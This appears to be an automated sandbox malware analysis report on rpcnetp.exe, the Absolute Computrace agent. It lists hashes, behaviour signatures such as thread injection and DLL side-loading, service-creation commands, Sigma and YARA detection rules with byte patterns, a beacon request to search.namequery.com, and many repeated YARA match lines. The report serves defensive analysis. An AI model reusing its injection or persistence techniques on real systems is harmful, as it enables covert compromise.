Create Interactive Tour

Windows Analysis Report rpcnetp.exe

Overview

General Information

Sample Name:rpcnetp.exe
Analysis ID:499091
MD5:57bd3200910a8d2c85b1927b27123a6b
SHA1:bd08ae784aa0ed5428347c861ebeb71554af217f
SHA256:f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
DLL side loading technique detected
Sigma detected: Suspicious Svchost Process
Injects files into Windows application
Writes to foreign memory regions
Creates a thread in another existing process (thread injection)
Allocates memory in foreign processes
Uses 32bit PE files
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Drops PE files
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 6932 cmdline: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6984 cmdline: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • cmd.exe (PID: 7016 cmdline: cmd /c sc start EcVoz >> C:\servicestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 7056 cmdline: sc start EcVoz MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • rpcnetp.exe (PID: 7072 cmdline: C:\Users\user\Desktop\rpcnetp.exe MD5: 57BD3200910A8D2C85B1927B27123A6B)
    • svchost.exe (PID: 7116 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • iexplore.exe (PID: 7148 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
rpcnetp.exePUP_ComputraceAgentAbsolute Computrace Agent ExecutableASERT - Arbor Networks (slightly modified by Florian Roth)
  • 0x42fd:$a: D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04
  • 0x4fc2:$b1: 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00
  • 0x64c:$b2: 54 61 67 49 64 00
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\rpcnetp.dllPUP_ComputraceAgentAbsolute Computrace Agent ExecutableASERT - Arbor Networks (slightly modified by Florian Roth)
  • 0x42fd:$a: D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04
  • 0x4fc2:$b1: 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00
  • 0x64c:$b2: 54 61 67 49 64 00

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Svchost Process
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\Desktop\rpcnetp.exe, ParentImage: C:\Users\user\Desktop\rpcnetp.exe, ParentProcessId: 7072, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 7116
Sigma detected: New Service Creation
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , CommandLine: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6932, ProcessCommandLine: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , ProcessId: 6984
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\Desktop\rpcnetp.exe, ParentImage: C:\Users\user\Desktop\rpcnetp.exe, ParentProcessId: 7072, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 7116

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Desktop\rpcnetp.dllVirustotal: Detection: 7%Perma Link
Source: rpcnetp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: rpcnetp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: iexplore.exe, 00000008.00000000.695874570.0000000003F0C000.00000004.00000010.sdmpString found in binary or memory: http://search.namequery.com/
Source: unknownHTTP traffic detected: POST / HTTP/1.1TagId: 0User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)Host: search.namequery.comContent-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: search.namequery.com

System Summary:

barindex
Source: rpcnetp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: rpcnetp.exe, type: SAMPLEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.62.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.58.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.0.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.31.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.4.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.16.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.13.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.8.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.66.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.43.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.67.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.13.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 6.2.rpcnetp.exe.72b20000.1.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 6.0.rpcnetp.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.40.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.2.svchost.exe.72b20000.0.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.28.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.6.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.14.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.63.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.11.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.54.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.50.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.14.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.12.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.19.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.18.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.46.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.21.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.21.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.65.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.29.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.75.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.72.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.4.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.26.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.20.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.2.iexplore.exe.72b20000.0.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.5.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.76.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.19.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.71.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.47.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.51.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.29.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.17.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.35.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 6.2.rpcnetp.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.52.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.27.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.45.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.77.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.27.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.3.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.18.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.22.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.36.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.81.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.7.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.38.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.24.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.37.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.26.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.23.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.49.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.24.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.1.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.70.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.80.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.7.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.28.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.34.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.23.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.30.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.56.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.41.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.32.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.5.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.53.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.55.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
